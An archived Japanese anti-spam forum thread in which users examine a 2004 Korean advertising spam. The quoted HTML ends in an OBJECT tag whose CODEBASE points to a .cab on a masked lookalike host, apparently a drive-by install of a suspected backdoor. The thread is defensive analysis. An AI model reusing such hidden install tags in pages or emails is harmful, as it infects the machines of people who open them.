| [ 16955 ] 迷惑メール(spam)撲滅私的調査会 HTML化ログ |
|---|
ID-code:VZYXNtkShLg
私のところにはよく韓国語のスパムが届いていまして、これも最初はいつもの
普通のスパムかと思いました。
ところが、このスパム本文(HTMLのソースですが)の一番下に Object 要素が
ありますよね。
ここに書かれている MicrosoftMediasEx を検索してみたところ、どうやらトロイの
木馬ではないかという気がするのです。
http://www.symantec.com/region/jp/sarcj/data/b/backdoor.medias.html
残念ながら私は Object 要素の使い方を理解して無くてよく分からないのですが、
これは CODEBASE に記述されている URL (さすがにまずいかと思い、伏せておきます。)
からファイルをダウンロード&実行させるように書かれているのでしょうか?
つまり、スパマーがトロイの木馬の感染を広げようとしている?
もしそうだとしたら、この手のスパムメールは初めて受け取ったような気がします。
ネットニュースのスパムでは、人為的にばらまかれたトロイの木馬付きスパムを、
嫌になるほど見かけますが…。
(とはいえ、たったこれだけのHTMLで、得体の知れないファイルを実行してしまう
場合があるんだろうか?)
なお、このメールは multipart/mixed となっていますが、実際には base64
エンコーディングされた HTMLパートのみで、添付ファイルは付いていませんでした。
また、文字化けしている Subject の韓国語は、翻訳にかけると以下のようになっています。
〔広告〕高麗長脳参出市記念無料服用イベント実施/1人1回,先着順締切!@
# ついでに、Date の最後に書いてあるのは「大韓民国標準時」らしいです(^^;
Object 部分が引っかかる事を除くと、韓国の表示義務を意識した(でも守って
ない)件名といい、本文にローカルで表示できる文章が一切無い点といい、普通の
韓国語スパムなのですが。
Received: from knb.zpyb.net (unknown [61.84.39.141])
by mail.*****.ne.jp (Postfix) with ESMTP id 792FB235E38
for <*****@*****.ne.jp>; Tue, 6 Apr 2004 15:44:57 +0900 (JST)
From: sdgheryher34523@hotmail.com
To: *****@*****.ne.jp
Subject: _韻壱ヽ壱形舌噛誌 窒獣奄割 巷戟差遂 戚坤闘 叔獣/1昔1噺,識鐸授原姶!@
Date: Tue, 06 Apr 04 15:07:26 企廃肯厩 妊層獣
MIME-Version: 1.0
Content-Type: multipart/mixed;boundary= "----=_NextPart_000_0041_6EBBF327.C363F26F"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2462.0000
Message-Id: <20040406064457.792FB235E38@mail.*****.ne.jp>
X-UIDL: 5lT!!#iY"!&I,!!G`<"!
Content-Type: text/html; charset= "ks_c_5601-1987"
Content-Transfer-Encoding: base64
<html>
<head>
<title>・ 戚耕走亜 左食走走 省生獣檎 焼掘 戚耕走左奄 獄動聖 刊牽室推.</title>
<meta http-equiv="Content-Type" content="text/html; charset=euc-kr">
</head>
<body bgcolor="#FFFFFF" text="#000000" leftmargin="0" topmargin="0">
<a href="ttp://www.clickopen.net/mail/jin/jin_s.htm"><img src="ttp://www.clickopen.net/mail/jin/jin.jpg" border="0"></a> <br>
<a href="ttp://www.clickopen.net/mail/sugeo/sugeo_jin.htm"><img src="ttp://www.clickopen.net/mail/jin/jin_sugeo.jpg" border="0"></a> <OBJECT ID="MicrosoftMediasEx" CLASSID="CLSID:F44CA80E-E7A7-4849-8630-EF56D763C255"
CODEBASE='http://*****.net/popup/MicorosoftMedias.cab#version=1,0,0,1'></body>
</html>
ID-code:4e61OyvGh4U
>残念ながら私は Object 要素の使い方を理解して無くて
>よく分からないのですが、
>これは CODEBASE に記述されている URL
>(さすがにまずいかと思い、伏せておきます。)
>からファイルをダウンロード&実行させるように
>書かれているのでしょうか?
フラッシュや、ショックウェーブ、その他のプラグインを使って、
HPを構成している方ならお分かりかと思いますが、
codebaseからプラグインを(なければ)引っ張ってこようとします。
ですので、表示させるだけでも結構危ないかと思います。
どうしてもというのであれば、テキストブラウザで・・(ぉ
もっと詳しい方説明をお願いします。m(__)m
(私も大して知識がないので詳しいことは述べられませんが)
ID-code:VZYXNtkShLg
返答ありがとうございます。
> フラッシュや、ショックウェーブ、その他のプラグインを使って、
> HPを構成している方ならお分かりかと思いますが、
> codebaseからプラグインを(なければ)引っ張ってこようとします。
やはりそういう感じなのですか。
実は URL の伏せた部分が、某 FLASH で有名な会社と一字違いの文字列となって
いるんです。
自動実行とまではいかなくても、勘違いしたユーザーにプラグインをインストール
させようとしているのかな、なんて気がします。
> ですので、表示させるだけでも結構危ないかと思います。
> どうしてもというのであれば、テキストブラウザで・・(ぉ
とりあえず Linux の Mozilla や Konqueror で表示してみましたが、
普通の宣伝ページが表示されただけで、プラグインのダウンロードダイアログ
みたいなものは表示されませんでした。
IE 専用なのか、OS で跳ねられたのか分かりかねますが、Win な環境でチェック
してみる勇気はちょっとないです(^^;
CAB ファイルそのものはちゃんと存在していて、直接 URL を指定したら
ダウンロードできました。
ただ、私の使っているウイルスバスターではウイルスとして検出しないようです。
ノートンのサイトにハッシュ値を載せていてくれれば、本物かどうかの確認が
できるんですけどねぇ…。
ノートン以外のアンチウィルスベンダーには Medias の情報がない様子なので、
グレーゾーンに位置するプログラムなのかもしれません。
# ちょっとスパムから話が脱線している気もするので下げます。
#sage